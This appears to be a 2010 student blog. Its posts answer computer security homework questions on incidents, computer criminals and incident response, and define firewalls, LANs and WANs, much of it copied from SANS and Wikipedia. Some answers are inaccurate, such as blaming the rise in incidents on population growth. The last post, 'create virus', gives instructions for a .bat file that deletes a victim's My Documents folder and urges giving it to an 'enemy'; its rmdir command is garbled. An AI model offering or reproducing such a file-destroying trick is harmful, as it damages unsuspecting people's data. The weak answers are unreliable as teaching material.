Monday, December 13, 2010

1.Why has there been a dramatic increases in the number of computer security indents in recent   years? 

ans:There has been a dramatical increase of the number of computer security indents in recent years because there is also a increasing of population now. And  also because of lot of workers want to done their works  faster because fast done of work fast money increase...


2.What are some characteristics of common computer criminals?

ans.:The common characteristic of common computer criminals  are Amateurs 
  Crackers or malicious ,Hackers, Criminals Terrorists    

  

 3.What actions must be taken in response to a security indent?

ans.:A great deal of damage has been done to organizational reputations and a great deal of information has been lost in organizations that do not have fully effective incident response programs in place.  Without an incident response plan, an organization may not discover an attack in the first place, or, if the attack is detected, the organization may not follow proper procedures to contain damage, eradicate the attacker’s presence, and recover in a secure fashion.  Thus, the attacker may have far higher impact on the target organization, causing more damage, infecting more systems, and possibly exfiltrating more sensitive data than would otherwise be possible with an effective incident response plan.
If there is an incident and it’s identified as an attack, there are several things that can be done. The worst of course is the “lets close our eyes and maybe it will go away.” This happens more often than not.  So with that said there are two ways to approach incident response: Reactive and Proactive. Either is better then nothing, but if you can set your organization up to incorporate both you have a plan that will carry you through the worst situations.
A good reactive plan involves policies and training to identify what requires response, what should be done when an incident is identified, and the best course of action to take.  A good proactive plan puts in place all of the necessary components towards identifying or stopping  potential attacks before they are able to be completed.
Incident response is key when safeguarding data once an incident has occurred. If an incident is identified and personnel identifying it are able to respond appropriately, the ability to safeguard data and recover back to an operational state has increased.  In some cases a properly developed incident response plan can prevent a small incident from becoming a catastrophe.  Incident response is more than a group of people responding to an incident.  A good response team is developed with a strong set of procedures in place to ensure each member knows their role and that the individual who identified the incident also knows the proper reporting procedures.
For any good process to work, management must see the value of having the policies and process. This is a key element towards developing a working response plan.  There are numerous guides and standards that outline response procedures and methods. It is important to know which guidelines your organization falls under and incorporate your own standards that meet or exceed government minimum standards.  A good baseline is the NIST Guidelines.
Once the standards have been identified, ensure that all team members are aware of their roles and responsibilities.  Conduct training to reinforce the policies and incident response roles for both team members and managers. Executive management should be involved in various aspects of the incident response plan to ensure buy-in and support.
Before an incident response can be initiated there must be set policies that identify what actions must be taken for the different types of incidents. Policies and training will ensure that the proper methodology is followed to ensure a successful outcome to the incident.  Policies should be clear and not left for interpretation by members of the organization or contractors.
When an incident occurs, all aspects of training and policy must be followed. This will ensure a positive outcome.   All reports should be based on an organization-wide template to ensure uniformity.
The key element of this process is the reporting and documentation of the incident. The documentation can be useful in identifying shortfalls and high points. Documentation will allow for good audit reviews and process improvements as well as protection from legal repercussions due to an incident.
All reports should be clear and concise, they should contain only factual observations and information. A report should not contain information based on conjecture.

 source:
http://blogs.sans.org/security-leadership/2009/08/18/critical-control-18-incident-response-capability/

Monday, December 6, 2010

It104 aljohn sidayon

Firewall
is a part of a computer system or network that is designed to block unauthorized access while permitting authorized communications. It is a device or set of devices that is configured to permit or deny network transmissions based upon a set of rules and other criteria.
Firewalls can be implemented in either hardware or software, or a combination of both. Firewalls are frequently used to prevent unauthorized Internet users from accessing private networks connected to the Internet, especially intranets. All messages entering or leaving the intranet pass through the firewall, which inspects each message and blocks those that do not meet the specified security criteria.

Several types of firewall techniques:
  1. Packet filter: Packet filtering inspects each packet passing through the network and accepts or rejects it based on user-defined rules. Although difficult to configure, it is fairly effective and mostly transparent to its users. It is susceptible to IP spoofing.
  2. Application gateway: Applies security mechanisms to specific applications, such as FTP and Telnet servers. This is very effective, but can impose a performance degradation.
  3. Circuit-level gateway: Applies security mechanisms when a TCP or UDP connection is established. Once the connection has been made, packets can flow between the hosts without further checking. 
  4. Proxy server: Intercepts all messages entering and leaving the network. The proxy server effectively hides the true network addresses.

 LAN(Local Area Network)
supplies networking capability to a group of computers in close proximity to each other such as in an office building, a school, or a home. A LAN is useful for sharing resources like files, printers, games or other applications.

WAN(Wide Area Network)
WANs are used to connect LANs and other types of networks together, so that users and computers in one location can communicate with users and computers in other locations. Many WANs are built for one particular organization and are private. Others, built by Internet service providers, provide connections from an organization's LAN to the Internet. WANs are often built using leased lines. At each end of the leased line, a router connects to the LAN on one side and a hub within the WAN on the other. Leased lines can be very expensive. Instead of using leased lines, WANs can also be built using less costly circuit switching or packet switching methods. Network protocols including TCP/IP deliver transport and addressing functions. Protocols including Packet over SONET/SDH, MPLS, ATM and Frame relay are often used by service providers to deliver the links that are used in WANs. X.25 was an important early WAN protocol, and is often considered to be the "grandfather" of Frame Relay as many of the underlying protocols and functions of X.25 are still in use today (with upgrades) by Frame Relay.
Academic research into wide area networks can be broken down into three areas: Mathematical models, network emulation and network simulation.


                                                                                             source:http://wikipedia.com

Thursday, November 18, 2010

create virus

HERE'S A WAY I FOUND TO DELETE THE MY DOCUMENTS FOLDER OF UR ENEMY OR JUST 4 FUN.
HERE'S WHAT U SHOULD DO.
OPEN NOTEPAD AND COPY-PASTE THE FOLLOWING CODE IN IT.
THEN SAVE THE FILE WITH WHATEVER NAME U LIKE BUT BE SURE TO SAVE IT AS A BAT FILE.
I MEAN SAVE IT LIKE MYVIRUS.BAT. IT SHOULD HAVE THE ENDING AS .BAT.
NOW IF U GIVE THIS TO SOMEONE AND IF HE RUNS THIS PROGRAM THEN HIS MY DOCUMENT FOLDER WILL BE DELETED.rmdir C documents and Settings SQ.